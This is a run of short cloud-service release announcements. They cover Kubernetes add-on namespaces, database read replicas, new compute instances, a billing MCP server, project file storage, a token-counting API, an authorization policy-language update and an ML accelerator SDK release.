Ready to get to the root of your troubles faster? Try investigations now by investigating any error logs from the Logs Explorer console. Or create an investigation directly and describe any issues you might be having.
Amazon Elastic Kubernetes Service (Amazon EKS) now supports Kubernetes namespace configuration for AWS and Community add-ons, providing you greater control over how add-ons are organized within your Kubernetes cluster.
With namespace configuration, you can now specify a custom namespace during add-on installation, enabling better organization and isolation of add-on objects within your EKS cluster. This flexibility helps you align add-ons with your operational needs and existing namespace strategy. Once an add-on is installed in a specific namespace, you must remove and recreate the add-on to change its namespace.
This feature is available through the AWS Management Console, Amazon EKS APIs, AWS Command Line Interface (CLI), and infrastructure as code tools like AWS CloudFormation. Namespace configuration for AWS and Community add-ons is now available in all commercial AWS Regions. To learn more, visit the Amazon EKS documentation.
Amazon RDS for PostgreSQL now supports delayed read replicas, allowing you to specify a minimum time period that a replica database lags behind a source database. This feature creates a time buffer that helps protect against data loss from human errors such as accidental table drops or unintended data modifications.
In disaster recovery scenarios, you can pause replication before problematic changes are applied, resume replication up to a specific log position, and promote the replica as your new primary database. This approach enables faster recovery compared to traditional point-in-time restore operations, which can take hours for large databases.
This feature is available in all AWS Regions where RDS for PostgreSQL is offered, including the AWS GovCloud (US) Regions, at no additional cost beyond standard RDS pricing. To learn more, visit the Amazon RDS for PostgreSQL documentation.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) R7g instances are available in the AWS Africa (Cape Town) region. These instances are powered by AWS Graviton3 processors that provide up to 25% better compute performance compared to AWS Graviton2 processors, and are built on top of the AWS Nitro System, a collection of AWS-designed innovations that deliver efficient, flexible, and secure cloud services with isolated multi-tenancy, private networking, and fast local storage.
Amazon EC2 Graviton3 instances also use up to 60% less energy than comparable EC2 instances for the same performance, reducing your cloud carbon footprint. For increased scalability, these instances are available in 9 different instance sizes, including bare metal, and offer up to 30 Gbps networking bandwidth and up to 20 Gbps of bandwidth to Amazon Elastic Block Store (EBS).
Amazon Relational Database Service (RDS) for DB2 now supports read replicas. Customers can add up to three read replicas for their database instance, and use the replicas to support read-only applications without overloading the primary database instance.
Customers can set up replicas in the same region or in a different region from the primary database instance. When a read replica is set up, RDS replicates changes asynchronously to the read replicas. Customers can run their read-only queries against the read replica without impacting performance of the primary database instance. Customers can also use read replicas for disaster recovery procedures by promoting a read replica to support both read and write operations.
Read replicas require IBM Db2 licenses for all vCPUs on replica instances. Customers can obtain On-Demand Db2 licenses from the AWS Marketplace, or use Bring Your Own License (BYOL). To learn more, refer to Amazon RDS for Db2 documentation and pricing pages.
Today, AWS announced the release of a model context protocol (MCP) server for Billing and Cost Management, now available in the AWS Labs GitHub repository. The Billing and Cost Management MCP server allows customers to analyze their historical spending, find cost optimization opportunities, and estimate the costs of new workloads using the AI agent or assistant of their choice.
Artificial intelligence is transforming the way that customers manage FinOps practices. While customers can access AI-powered cost analysis and optimization capabilities in Amazon Q Developer in the console, the Billing and Cost Management MCP server brings these capabilities to any MCP-compatible AI assistant or agent that customers may be using, such as the Amazon Q Developer CLI, the Kiro IDE, Visual Studio Code, or Claude Desktop. This MCP server gives these clients rich capabilities to analyze historical and forecasted cost and usage data, identify cost optimization opportunities, understand AWS service pricing, find cost anomalies, and more. The MCP server not only provides access to AWS service APIs; it also provides a dedicated SQL-based calculation engine allowing AI assistants to perform reliable, reproducible calculations — ranging from period-over-period changes to unit cost metrics — and easily handle large volumes of cost and usage data.
You can download and integrate the open-source server with your preferred MCP-compatible AI assistant. The server connects securely to the AWS Billing and Cost Management services using standard AWS credentials with minimal configuration required. To get started, visit the AWS Labs GitHub repository.
Amazon SageMaker Unified Studio now offers a simplified file storage option in projects, providing data workers with an easier way to collaborate on their analytics and machine learning workflows without depending on Git. You can now choose between Git repositories (GitHub, GitLab, or Bitbucket Cloud) or Amazon Simple Storage Service (Amazon S3) buckets for sharing code files between the various members of a project. While S3 is the default option, customers who want to use Git can still continue to have the same experience as they currently do.
With this launch, customers will see a consistent view of their files irrespective of the tool they are working in across SageMaker Unified Studio (such as JupyterLab, Code Editor or SQL query editor) making it easy to create, edit and share code. The S3 file storage option operates on a “last write wins” principle and supports basic file versioning when enabled by administrators. This option is particularly beneficial for data science teams who want to focus on their analytics and machine learning work without managing Git operations, while still maintaining a collaborative workspace for their project artifacts.
This feature is available in all AWS Regions where Amazon SageMaker Unified Studio is available. To learn more about storage options in SageMaker Unified Studio projects, see Managing Project Files in the Amazon SageMaker Unified Studio User Guide.
The Count Tokens API is now available in Amazon Bedrock, enabling you to determine the token count for a given prompt or input being sent to a specific model ID prior to performing any inference.
By surfacing a prompt’s token count, the Count Tokens API allows you to more accurately project your costs, and provides you with greater transparency and control over your AI model usage. It allows you to proactively manage your token limits on Amazon Bedrock, helping to optimize your usage and avoid unexpected throttling. It also helps ensure your workloads fit within a model’s context length limit, allowing for more efficient prompt optimization.
Amazon Verified Permissions now supports Cedar 4.5. This enables customers to use the latest Cedar features, including the “is” operator, which allows customers to grant access based on resource types. For example, in a petstore application, you can use the “is” operator to write a policy that only grants administrators permission to view a resource if that resource “is” an invoice. This addition enhances Cedar’s type system and helps catch potential type-related errors early in policy development. You can learn about other enhancements to Cedar on the Cedar releases page.
Amazon Verified Permissions is a permissions management and fine-grained authorization service for the applications that you build. Amazon Verified Permissions uses the Cedar policy language to enable developers and admins to define policy-based access controls using roles and attributes.
Amazon Verified Permissions supports Cedar 4.5 in all AWS Regions where the service is available. All new accounts and existing, backward-compatible accounts have been automatically upgraded to Cedar 4.5, and no additional actions are required. For more information about Amazon Verified Permissions, visit the Verified Permissions product page.
Today, AWS announces the general availability of Neuron SDK 2.25.0, delivering improvements for inference workloads and performance monitoring on AWS Inferentia and Trainium instances. This latest release adds context and data parallelism support as well as chunked attention for long sequence processing in inference, and updates the neuron-ls and neuron-monitor APIs with more information on node affinities and device utilization, respectively.
This release also introduces automatic aliasing (Beta) for fast tensor operations, and adds improvements for disaggregated serving (Beta). Finally, it provides upgraded AMIs and Deep Learning Containers for inference and training workloads on Neuron.
Neuron 2.25.0 is available in all AWS Regions where Inferentia and Trainium instances are offered.
To learn more and for a full list of new features and enhancements, see: